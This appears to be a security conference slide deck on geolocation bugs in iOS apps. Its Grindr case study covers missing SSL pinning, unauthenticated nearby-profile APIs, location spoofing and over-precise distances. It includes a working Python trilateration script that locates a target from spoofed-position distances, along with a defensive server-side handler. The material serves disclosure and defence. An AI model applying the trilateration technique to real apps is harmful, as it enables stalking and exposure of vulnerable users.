@colbymoore
“sources a global contingent of vetted security experts worldwide and pays them on an incentivized basis to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints.”
ABOUT
always looking for more experts!
@colbymoore / VRL / SYNACK
vetted researchers
internal R&D
backed by google
AN OUTLINE: geolocation bugs, hacks, & fixes
- all things geo: code & bugs
- case study: lots of bugs, tracking users
- fixes/conclusions
ALL THINGS GEO: overview, code, & bugs
GEOLOCATION IN MOBILE APPS: incorporating geolocation is the norm
74% of smartphone users get info based on their phone's current location
[chart: apps that use geo vs. apps with no geo]
common uses: social, recommendations, tracking, health & fitness, commerce, navigation
"84% inquire about location"
HOW IS GEOLOCATION ACCOMPLISHED (IOS)?
"The CLLocationManager class is the central point for configuring the delivery of location-related events to your app." - apple.com
using the Core Location Manager: create -> set delegate -> start -> wait/handle
GEOLOCATION (IOS): 'doing it' in Swift
    import UIKit
    import CoreLocation  // required framework
    // conform to CLLocationManagerDelegate
    class ViewController: UIViewController, CLLocationManagerDelegate {
        // [1] CREATE (instance of) location manager
        let locationManager = CLLocationManager()
        override func viewDidLoad() {
            super.viewDidLoad()
            locationManager.delegate = self                   // [2] set DELEGATE
            locationManager.requestWhenInUseAuthorization()   // request auth (foreground only)
            locationManager.startUpdatingLocation()           // [3] START collecting location
        }
        // [4] WAIT/HANDLE: delegate (callback) function
        func locationManager(_ manager: CLLocationManager, didUpdateLocations locations: [CLLocation]) {
            guard let coordinate = locations.last?.coordinate else { return }
            // do whateverz: the user's location is in coordinate.latitude / coordinate.longitude
        }
    }
GEOLOCATION: (I)OS-LEVEL PROTECTIONS: os-level alerts
App's Info.plist key: NSLocationWhenInUseUsageDescription
code for auth request:
    //request auth for foreground
    self.locationManager.requestWhenInUseAuthorization()
iOS alert: "allow the app to get location updates only when the app is in the foreground"

GEOLOCATION: (I)OS-LEVEL PROTECTIONS: os-level alerts (cont.)
App's Info.plist key: NSLocationAlwaysUsageDescription
code for auth request:
    //request auth for foreground & background
    self.locationManager.requestAlwaysAuthorization()
iOS alert: "allows the app to receive location updates both when the app is in the foreground and in the background (suspended or terminated)"
caveat: on iOS 8+ the matching usage-description key must be present in Info.plist, otherwise the request is ignored and no prompt is shown
GEO CAN 'LEAK' IF THE APPLICATION IS BUGGY: ...bad for users!
who wants your location: hackers, "the government", thieves, criminals
“spies could be lurking to snatch data revealing the [app] player’s location” - nytimes.com
THEY KNOW YOUR LOCATION: ...so what!?
“investigators said the suspects used social networking sites such as Facebook to identify victims who posted online that they would not be home at a certain time” - thieves robbed homes based on facebook [3]
“a [geo]location allows perpetrators the perfect window to commit a burglary, vandalism, or even a home invasion” - criminal use of social media [2]
“[geolocation] generates a precise, comprehensive record of a person’s public movements that reflects a wealth of detail about her familial, political, professional, religious, and sexual associations” - u.s. v. jones [1]
[1] http://scholarship.kentlaw.iit.edu/cgi/viewcontent.cgi?article=3332&context=fac_schol
[2] http://www.nw3c.org/docs/whitepapers/criminal-use-of-social-media.pdf
[3] http://www.wmur.com/Police-Thieves-Robbed-Homes-Based-On-Facebook-Social-Media-Sites/11861116
COMMON CLASSES OF GEO BUGZ: can compromise a user's physical location
- insecure network comms
- insecure local storage
- location spoofing
- buggy server-side APIs
- overly precise location
- UI errors/validation
INSECURE NETWORK COMMS: may give attackers on the network path access to geo
insecure network comms:
- use unencrypted comms (a passive sniffer reads the geo)
- allow self-signed certificates (anyone in the path can MitM)
- forget to pin certificates (any CA the device trusts, including one the attacker installed, can MitM)
do not do these things!
INSECURE NETWORK COMMS: find such bugs with a proxy
[diagram: device -> https:// -> proxy -> https:// or http:// -> server]
proxy (burp) config + device config (point the device's proxy at burp)
INSECURE NETWORK COMMS: does the app accept self-signed certificates?
allowing a self-signed certificate (iOS): [NSURLRequest setAllowsAnyHTTPSCertificate:YES forHost:host] (a private API)
    ; class
    MOVT R8, #(:upper16:(classRef_NSURLRequest - 0xC254))
    ADD  R8, PC                 ; classRef_NSURLRequest
    ; method
    MOV  R2, #(selRef_setAllowsAnyHTTPSCertificate_forHost_ - 0xC2A4)
    ADD  R2, PC
    LDR  R4, [R2]               ; "setAllowsAnyHTTPSCertificate:forHost:"
    LDR  R5, [R8]               ; _OBJC_CLASS_$_NSURLRequest
    ; invoke method
    MOV  R0, R5                 ; _OBJC_CLASS_$_NSURLRequest
    MOV  R1, R4                 ; "setAllowsAnyHTTPSCertificate:forHost:"
    MOVS R2, #1                 ; 'YES'
    MOV  R3, R8                 ; the host
    BLX  _objc_msgSend
quick check: run strings on the binary and grep for "AllowsAnyHTTPSCertificate"; the same bug shows up in NSURLSession code as a challenge handler that returns the server trust unconditionally
INSECURE NETWORK COMMS: did the app forget to pin certificates?
non-jailbroken device + hacker's cert (installed as trusted on the device) = can MitM the connection
“SSL pinning is an extra layer of security that ensures a client will only communicate with a well-defined set of servers”
INSECURE LOCAL STORAGE: stolen or lost phones may compromise the user's geo
insecure local storage: store in unencrypted files (plists, logfiles, databases)
again, bad!
INSECURE LOCAL STORAGE: find such bugs with filemon & fileDP
display a file's protection attributes (iOS):
    //dump file attributes
    NSLog(@"attrs: %@", [[[NSFileManager defaultManager] attributesOfItemAtPath:path error:nil]
                            objectForKey:NSFileProtectionKey]);
monitoring the app's file I/O:
    # ./filemon
    Wheres_Waldo Created /Application Support/analytics/location.db-journal DEV: 1,3 INODE: 121171 MODE: 81a4 UID: 501 GID: 501 Arg64: 300649589561
    Wheres_Waldo Renamed /Preferences/lastKnownLocation.plist.l0mitdo DEV: 1,3 INODE: 121172 MODE: 8180 UID: 501 GID: 501
INSECURE LOCAL STORAGE: on iOS, always check the user's defaults plist
App's IDA disassembly:
    MOV  R1, #(selRef_standardUserDefaults-0x5917A)
    ADD  R1, PC
    LDR  R1, [R1]               ; "standardUserDefaults"
    MOV  R0, #(classRef_NSUserDefaults-0x591A2)
    ADD  R0, PC
    LDR  R0, [R0]               ; _OBJC_CLASS_$_NSUserDefaults
    BLX  _objc_msgSend          ; [NSUserDefaults standardUserDefaults]
    MOV  R3, #(cfstr_geoInfo-0x591D6)
    ADD  R3, PC                 ; "geoInfo"
    LDR  R2, [SP,#0xB4+usersGeo] ; geo data
    MOV  R1, #(selRef_setObject_forKey_-0x591D6)
    ADD  R1, PC
    LDR  R1, [R1]               ; "setObject:forKey:"
    BLX  _objc_msgSend          ; [userDefaults setObject:forKey:]
App's 'User Defaults' plist, in the app's /Library/Preferences/ with NSFileProtectionNone:
    <dict>
      <key>geoInfo</key>
      <dict>
        <key>homeLong</key>
        <real>73.242539</real>
        <key>homeLat</key>
        <real>34.169308</real>
        ...
      </dict>
    </dict>
NSUserDefaults is not a place for sensitive data: use the keychain, or a file written with NSFileProtectionComplete
LOCATION SPOOFING: don't trust geolocation from the client
location spoofing - be careful if you do this!
- explicitly trust client-side geo (e.g. for user auth, or for access to 'relative' data)
- allow the client's (device's) location to rapidly change
LOCATION SPOOFING: find such bugs by manipulating reported geo
edit to spoof geo! any of:
- editing network dataz (intercept the request and change the coordinates)
- cycript (runtime manipulations)
- location spoofing apps (from Cydia)
OVER PRECISE LOCATION: do apps really need precision to 12 decimal places?!
over precise location - treat with care!
- collect geolocation as precise as possible
  long: 73.242539906632...  (2 decimals ~1 km, 5 decimals ~1 m, 8 decimals ~1 mm)
- don't specify a 'desired accuracy' (iOS defaults to the highest, kCLLocationAccuracyBest)
OVER PRECISE LOCATION: sniffing (network or file I/O), or look at the disassembly
setting 'desired accuracy' (Swift):
    //create instance of location manager
    let locationManager = CLLocationManager()
    //set 'desired accuracy'
    locationManager.desiredAccuracy = kCLLocationAccuracyBest
IDA disassembly of the same call:
    MOV  R4, #(_kCLLocationAccuracyBest_ptr - 0xACD8)
    ADD  R4, PC, R4             ; _kCLLocationAccuracyBest_ptr
    LDR  R4, [R4]               ; _kCLLocationAccuracyBest
    VLDR D16, [R4]
    VMOV R2, R3, D16            ; R2 contains _kCLLocationAccuracyBest
    LDR  R1, [SP,#0xF8+selRef_setDesiredAccuracy]
    LDR  R1, [R1]               ; R1 contains selRef_setDesiredAccuracy
                                ; R0 has the locationManager object
    LDR  R9, [SP,#0xF8+objc_msgSend] ; __imp__objc_msgSend
    ; objc_msgSend(locationManager, "setDesiredAccuracy:", _kCLLocationAccuracyBest);
    BLX  R9
INSECURE SERVER-SIDE APIS: unprotected APIs may provide geo
insecure server-side APIs - all bad assumptions/ideas!
- assume undocumented APIs are hidden
- allow unauthorized queries
- allow unlimited (un-throttled) queries
- provide unrestricted geo
INSECURE SERVER-SIDE APIS: sniffing network traffic often reveals undocumented APIs
[screenshot: intercepted outgoing request vs. modified request (changed user)]
holy $#!@, did we just find Carmen Sandiego!? ;)
USER INTERFACE: what lurks below?
user interface - all bad assumptions/ideas!
- assume the UI is 'secure'
- implement client-side protection (in the UI)
- ignore user settings

USER INTERFACE: don't enforce anything at the UI level
UI-level logic (e.g. precision rounding, hiding a field) is trivially bypassed:
- the client's location is still sent to the server (at full precision)
- precise geolocation (of other users) is still sent to the device
- or the UI settings are simply ignored!
EXAMPLES OF GEO BUGS: buggy apps that compromised a user's physical location
starbucks, whisper, angry birds, tinder
grindr (case study)
STARBUCKS: overpriced coffee, plus a shot of geo tracking
[CVE-2014-0647] Insecure Data Storage of User Data in Starbucks v2.6.1 iOS mobile application (Daniel Wood)
/Library/Caches/com.crashlytics.data/com.starbucks.mystarbucks/session.clslog
“[unencrypted] geolocation data included alongside username and password data, meaning that hackers can potentially see where a user most often traveled if they were to access the phone”
WHISPER: “the safest place on the internet” - NOPE
- users monitored/tracked (even if opted out)
- geo stored 'indefinitely'
- shared with the DOD
“Revealed: how Whisper app tracks ‘anonymous’ users” - the guardian
TINDER: precise geo of nearby users allowed tracking
tinder user trilateration (blog.includesecurity.com)
    main_photo_url = photos[0]['url']
'tinderizer': matches -> facebook profiles
ANGRY BIRDS: ...'they' are watching you play
“the ABC have been developing capabilities to take advantage of "leaky" smartphone apps, such as the wildly popular Angry Birds game, that transmit users' private information [geo]” - the guardian
CASE STUDY - GRINDR: many, many #$&@-ups
WHAT'S GRINDR? an (all-male) social-dating app
“the largest and most popular all-male location-based social network out there. more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app every day” - grindr.com
all about geo, extremely popular, targeted group
GRINDR'S PREVIOUS ISSUES: those who cannot learn from history are doomed to repeat it
2012: “Love online: 100,000 Grindr users exposed in hack attack” - sydney morning herald
2013: Grindr Application Security Evaluation Report - university of amsterdam
2014: “Grindr fails to protect users” - anonymous (pastebin)
2014: Grindr Application Analysis - synack
GRINDR (CASE STUDY): “0 Feet Away”
- lack of SSL pinning
- overly precise geo (client-side precision)
- location spoofing
- overly permissive APIs
- broken UI-level logic (sharing geo)
yes, so much wrong!
BUG 0X1: LACK OF SSL PINNING - the app does not pin its certs
exposed to a MitM: login info, user geolocation
BUG 0X2: REPORTING OF PRECISE GEO - the app reported (overly) precise relative distances
request: primus.grindr.com POST /2.0/nearbyProfiles
response:
    {"status": 1, "distance": 3.861290174942267, "relationshipStatus": 1, "displayName": "Waldo",
     "isFavorite": false, "showDistance": true, "height": 187.960006713867, "profileId": 12345678, ...}
3.861290174942267 km away (sub-millimetre precision, far beyond what any GPS fix supports)
BUG 0X2: REPORTING OF PRECISE GEO - even newer versions may reveal precise location
newer versions set the client's desired accuracy:
    //create instance of location manager
    let locationManager = CLLocationManager()
    //set 'desired accuracy'
    locationManager.desiredAccuracy = kCLLocationAccuracyNearestTenMeters
[map: 10 meter location reporting still places a user at the office]
caveat: this only coarsens the device's own fix; the distance the server reports is still a full-precision float
BUG 0X3: LOCATION SPOOFING - can spoof your location...as much as you want
the request carries the geolocation coordinates used to find 'nearby' users: change these at will!
trilateration?
BUG 0X4: WIDE-OPEN APIS - unauthenticated, unlimited access to APIs
request for users' info: primus.grindr.com POST /2.0/nearbyProfiles
    {
      "filter": { "page": 1, "quantity": 50 },
      "lat": <any lat>,
      "lon": <any lon>
    }
user info returned: name, height, weight, relative distance
BUG 0X5: 'BROKEN' UI LEVEL LOGIC - what you see/say isn't what you get
UI-level logic:
    if !showDistance {
        hide distance
    }
the 'show distance' setting is enforced only in the UI; the server sends "distance" regardless (the nearbyProfiles response above carries both "showDistance" and "distance")
srsly? wtf!
DISCLAIMER: our goal was to help Grindr understand the issues
during vulnerability research and disclosure no individual users were intentionally or unintentionally identified
all data logged has been irrecoverably destroyed
the purpose of this research was not to identify Grindr users but to help protect those that wish to remain private
IT'S MORPHIN' TIME: combining bugs can lead to “total tracking”
wide-open APIs + precise relative geo + location spoofing = tracking of any user anywhere!
COLLECTING DATAZ: query the APIs to get info about all 'nearby' users
request:
    $ python collectInfo.py -o output.json
    [+] sent request to: primus.grindr.com POST /2.0/nearbyProfiles
    [+] saving response (50 users)
response:
    $ less output.json
    "profiles": [{
        "profileId": 314159265,
        "displayName": "Waldo",
        "aboutMe": "Where am I?",
        "distance": 0.4980983433684
    }, ...
TRILATERATION: determine absolute location from relative distances
“trilateration is the process of determining absolute locations by measurement of (relative) distances, using the geometry of circles, spheres or triangles.”
trilateration script:
    $ python findUser.py -i 314159265
    [+] making query 1, 2, 3
    [+] got three relative distances
    [+] converting geodetic lat/long to ECEF
    [+] transforming: circle 1 at origin, circle 2 on x axis, etc.
    [+] generating array with ECEF x,y,z
    [+] converting ECEF back to lat/long
    [+] user is at: 73.242539906632, 34.169308121551  (long, lat)
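The procedure the script output above describes, reimplemented as an added, self-contained Python example. This is not Synack's findUser.py: the target coordinates, the three spoofed probe positions and the fake_nearby_distance stand-in for the nearbyProfiles API are all constructed for the example. It converts lat/long to ECEF, puts circle 1 at the origin and circle 2 on the x axis, solves for the target in the plane of the three probes, converts back to lat/long, and then repeats the run with the server rounding distances to whole kilometres to show how much a coarsened distance still leaks.

```python
import math

EARTH_RADIUS_KM = 6371.0  # a spherical Earth is plenty for km-scale trilateration


def geodetic_to_ecef(lat_deg, lon_deg):
    """Spherical lat/lon (degrees) -> Earth-centred, Earth-fixed (x, y, z) in km."""
    lat, lon = math.radians(lat_deg), math.radians(lon_deg)
    return (EARTH_RADIUS_KM * math.cos(lat) * math.cos(lon),
            EARTH_RADIUS_KM * math.cos(lat) * math.sin(lon),
            EARTH_RADIUS_KM * math.sin(lat))


def ecef_to_geodetic(x, y, z):
    """Direction of an ECEF point -> (lat, lon) in degrees on the sphere."""
    return (math.degrees(math.atan2(z, math.hypot(x, y))),
            math.degrees(math.atan2(y, x)))


# small vector helpers on 3-tuples
def sub(a, b): return tuple(i - j for i, j in zip(a, b))
def add(a, b): return tuple(i + j for i, j in zip(a, b))
def scale(a, k): return tuple(i * k for i in a)
def dot(a, b): return sum(i * j for i, j in zip(a, b))
def norm(a): return math.sqrt(dot(a, a))
def unit(a): return scale(a, 1.0 / norm(a))


def chord_km(p, q):
    """Straight-line distance between two (lat, lon) points in km. At city
    scale it differs from the great-circle distance by micrometres."""
    return norm(sub(geodetic_to_ecef(*p), geodetic_to_ecef(*q)))


def trilaterate(observations):
    """observations: three (lat, lon, distance_km) tuples, i.e. where the
    spoofed client claimed to be and the relative distance the server
    returned for the target from that spot. Returns (lat, lon) of the target."""
    (la1, lo1, r1), (la2, lo2, r2), (la3, lo3, r3) = observations
    p1, p2, p3 = (geodetic_to_ecef(la1, lo1), geodetic_to_ecef(la2, lo2),
                  geodetic_to_ecef(la3, lo3))
    # Frame in the plane of the three probes: circle 1 at the origin,
    # circle 2 on the x axis, circle 3 wherever it falls in that plane.
    ex = unit(sub(p2, p1))
    d = norm(sub(p2, p1))
    i = dot(ex, sub(p3, p1))
    ey = unit(sub(sub(p3, p1), scale(ex, i)))
    j = dot(ey, sub(p3, p1))
    # Standard circle-intersection solution in that frame.
    x = (r1 ** 2 - r2 ** 2 + d ** 2) / (2 * d)
    y = (r1 ** 2 - r3 ** 2 + i ** 2 + j ** 2) / (2 * j) - (i / j) * x
    # Probes and target all sit on the Earth's surface, so the out-of-plane
    # component is centimetres and numerically ill-conditioned: drop it and
    # let the back-conversion project the in-plane point onto the sphere.
    est = add(p1, add(scale(ex, x), scale(ey, y)))
    return ecef_to_geodetic(*est)


def fake_nearby_distance(target, probe, decimals=None):
    """Constructed stand-in for the 'distance' field of a nearbyProfiles
    response. decimals=None mimics the raw float the API returned; an int
    mimics a server that rounds before answering."""
    d = chord_km(probe, target)
    return d if decimals is None else round(d, decimals)


def locate(target, probes, decimals=None):
    """Query from three spoofed positions and trilaterate the target."""
    obs = [(la, lo, fake_nearby_distance(target, (la, lo), decimals))
           for la, lo in probes]
    return trilaterate(obs)


def error_m(truth, estimate):
    """Distance in metres between the true and the recovered position."""
    return 1000.0 * chord_km(truth, estimate)


# Constructed data: a target in San Francisco and three spoofed client
# positions roughly 1.4 to 1.8 km away (not real users or real coordinates).
TARGET = (37.7749, -122.4194)
PROBES = [(37.7849, -122.4094), (37.7649, -122.4094), (37.7749, -122.4394)]

if __name__ == "__main__":
    print("raw float distances      -> error %.4f m" % error_m(TARGET, locate(TARGET, PROBES)))
    print("distances rounded to 1 km -> error %.0f m" % error_m(TARGET, locate(TARGET, PROBES, decimals=0)))
```

With the raw float the recovered position is exact to well under a millimetre, which is what the case study exploited. With the server rounding to whole kilometres the three circles no longer meet at a point, but the same three queries still place the target a few hundred metres from the truth, so rounding the reported distance on its own is not a fix.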
USER LOCATION: so let's map some users
[maps: San Francisco; Sochi (olympics); stores; capitols]
USER TRACKING: so let's track some willing users
your life; revealed
IDENTIFYING USERS: it'd be trivial to reveal anonymous users' identities
picture + profile name + geo tracking -> home & work revealed!
REPORTING TO GRINDR: ...didn't care :/
- early 2014: initial disclosure to vendor
- followups included conference calls, technical write-ups, & POCs
- didn't fix anything
“we do not view this as a security flaw” - grindr.com/blog/grindr-security
CAT GOT OUT OF THE BAG: ...sadly it came to this to get (some) fixes
“Egyptian officials have resorted to using location-based dating app Grindr to arrest gay men"
“Grindr fails to protect their users” - anonymous (pastebin)
people's lives affected :(
GRINDR RESPONSE: fixes & current issues
fixed:
- user's settings respected
- geofencing (in Egypt, etc.)
- geolocation collected at kCLLocationAccuracyNearestTenMeters
still open:
- no SSL pinning
- open APIs, no rate limiting
- spoofing
still can track most users!
FIXES/CONCLUSIONS: for users and devs alike

BEST PRACTICES: for users and app developers alike
user:
- assume you can be tracked
- disallow tracking at the OS level
developer:
- secure comms
- secure local storage
- protected APIs
- non-precise geo
- correct UI logic
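The developer side of the list above as an added Python example. This is not Grindr's or Synack's code: the NearbyService class, the policy constants and the sample profiles are assumptions made for this example. It puts the checks the case study found missing into one nearbyProfiles-style handler: authentication, coordinate validation, a per-account rate limit, an implied-speed check against spoofed jumps, and server-side enforcement of showDistance, with distances computed from grid-snapped positions and reported in coarse buckets instead of full-precision floats.

```python
import math
from dataclasses import dataclass, field

# Policy knobs for this example (assumed values, not any real app's).
MAX_QUERIES_PER_MINUTE = 30
MAX_PLAUSIBLE_SPEED_KMH = 1000.0   # faster than an airliner between two fixes => spoofing
GRID_DEG = 0.01                    # snap stored positions to ~1 km cells
DISTANCE_BUCKET_KM = 0.5           # and report distance in 500 m steps


class RateLimited(Exception):
    pass


class SuspiciousLocation(Exception):
    pass


def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) points in km."""
    la1, lo1, la2, lo2 = map(math.radians, (*a, *b))
    h = (math.sin((la2 - la1) / 2) ** 2
         + math.cos(la1) * math.cos(la2) * math.sin((lo2 - lo1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def snap(lat, lon, cell=GRID_DEG):
    """Round a position onto a coarse grid so no query can recover more than the cell."""
    return round(lat / cell) * cell, round(lon / cell) * cell


@dataclass
class Profile:
    profile_id: int
    display_name: str
    lat: float
    lon: float
    show_distance: bool = True


@dataclass
class Session:
    """Authenticated caller state, kept server-side."""
    user_id: int
    query_times: list = field(default_factory=list)   # epoch seconds of recent queries
    last_fix: tuple = None                             # (t, lat, lon) last accepted


class NearbyService:
    def __init__(self, profiles):
        self.profiles = list(profiles)

    def nearby(self, session, lat, lon, now):
        # [1] authenticated callers only: no anonymous enumeration
        if session is None:
            raise PermissionError("authentication required")
        # [2] never trust client geo blindly: sanity-check the values first
        if not (-90.0 <= lat <= 90.0 and -180.0 <= lon <= 180.0):
            raise ValueError("coordinates out of range")
        # [3] per-account throttle (sliding 60 s window) against bulk collection
        session.query_times = [t for t in session.query_times if now - t < 60]
        if len(session.query_times) >= MAX_QUERIES_PER_MINUTE:
            raise RateLimited("too many nearby queries")
        session.query_times.append(now)
        # [4] spoof check: a fix implying impossible speed since the last one is rejected
        if session.last_fix is not None:
            t0, lat0, lon0 = session.last_fix
            hours = max(now - t0, 1.0) / 3600.0
            if haversine_km((lat0, lon0), (lat, lon)) / hours > MAX_PLAUSIBLE_SPEED_KMH:
                raise SuspiciousLocation("implausible jump since last fix")
        session.last_fix = (now, lat, lon)
        # [5] build the response server-side: honour showDistance here, not in
        #     the UI, and never emit raw coordinates or full-precision floats
        out = []
        for p in self.profiles:
            if p.profile_id == session.user_id:
                continue
            entry = {"profileId": p.profile_id, "displayName": p.display_name}
            if p.show_distance:
                d = haversine_km((lat, lon), snap(p.lat, p.lon))
                entry["distance"] = round(d / DISTANCE_BUCKET_KM) * DISTANCE_BUCKET_KM
            out.append(entry)
        return out


# Constructed sample data (not real users).
PROFILES = [
    Profile(1001, "Waldo", 37.7849, -122.4194, show_distance=True),
    Profile(1002, "Carmen", 37.7700, -122.4300, show_distance=False),
]


def demo():
    """One legitimate query from a logged-in user in San Francisco."""
    svc = NearbyService(PROFILES)
    me = Session(user_id=42)
    return svc.nearby(me, 37.7749, -122.4194, now=1_400_000_000.0)
```

Rounding the reported distance alone only widens the trilateration error to roughly the bucket size; snapping the stored position before computing the distance is what bounds the leak, because any number of queries can then recover no more than the grid cell the user is in. The speed check does not stop an attacker who spoofs slowly, but it does break the rapid three-position probing the case study relied on from a single account, and together with the per-account rate limit it makes bulk collection expensive.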
where’s waldo?!
QUESTIONS & ANSWERS
@colbymoore
syn.ac/appSecCaGeo
…feel free to contact us any time!
CREDITS (images)
- thezooom.com
- deviantart.com (FreshFarhan)
- nicolevanputten.com
- http://agentfox.deviantart.com/art/chuck-Norris-hunting-waldo-42939561
- http://fc09.deviantart.net/fs70/f/2010/154/3/9/Waldo_by_MattMelvin.jpg
- http://th05.deviantart.net/fs71/PRE/i/2013/250/c/c/where_s_waldo_by_katanauser98-d6lgepy.png
- iconmonstr.com
- flaticon.com